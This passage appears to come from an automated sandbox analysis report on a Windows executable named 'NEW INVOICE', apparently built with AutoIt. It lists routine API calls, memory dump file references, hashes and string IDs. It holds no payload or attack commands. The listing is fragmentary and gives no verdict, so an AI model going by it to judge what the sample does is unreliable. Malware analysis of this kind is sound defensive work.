                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteDestroyObject$IconWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3349847261-0
                                                                                    • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                    • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                    • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                    • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                    • String ID:
                                                                                    • API String ID: 2223660684-0
                                                                                    • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                    • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                    • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                    • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                    APIs
                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                    • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                    • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                    • EndPath.GDI32(?), ref: 004472B0
                                                                                    • StrokePath.GDI32(?), ref: 004472BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                    • String ID:
                                                                                    • API String ID: 2783949968-0
                                                                                    • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                    • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                    • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                    • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 00417D1A
                                                                                      • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                      • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                    • __getptd.LIBCMT ref: 00417D31
                                                                                    • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                    • __lock.LIBCMT ref: 00417D4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                    • String ID:
                                                                                    • API String ID: 3521780317-0
                                                                                    • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                    • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                    • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                    • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 00471144
                                                                                    • GetDC.USER32(00000000), ref: 0047114D
                                                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                    • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                    • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                    • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                    APIs
                                                                                    • GetDesktopWindow.USER32 ref: 00471102
                                                                                    • GetDC.USER32(00000000), ref: 0047110B
                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                    • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                    • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                    • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                    • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                    • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2710830443-0
                                                                                    • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                    • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                    • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                    • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                      • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                      • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                    • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                    • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                    • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                    APIs
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                      • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                    • __getptd_noexit.LIBCMT ref: 00414080
                                                                                    • __freeptd.LIBCMT ref: 0041408A
                                                                                    • ExitThread.KERNEL32 ref: 00414093
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 3182216644-0
                                                                                    • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                    • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                    • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                    • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower
                                                                                    • String ID: $8'I
                                                                                    • API String ID: 2358735015-3608026889
                                                                                    • Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                    • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                    • Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                    • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                    APIs
                                                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                      • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                                    • String ID: AutoIt3GUI$Container
                                                                                    • API String ID: 3380330463-3941886329
                                                                                    • Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                    • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                                    • Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                                    • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00409A61
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                    • String ID: 0vH
                                                                                    • API String ID: 1143807570-3662162768
                                                                                    • Opcode ID: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                                    • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                                    • Opcode Fuzzy Hash: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                                    • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HH$HH
                                                                                    • API String ID: 0-1787419579
                                                                                    • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                    • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                                    • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                                    • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                                    • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                    • Opcode Fuzzy Hash: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                                    • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: '
                                                                                    • API String ID: 3850602802-1997036262
                                                                                    • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                    • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                    • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                    • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                    • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                    • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                    • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
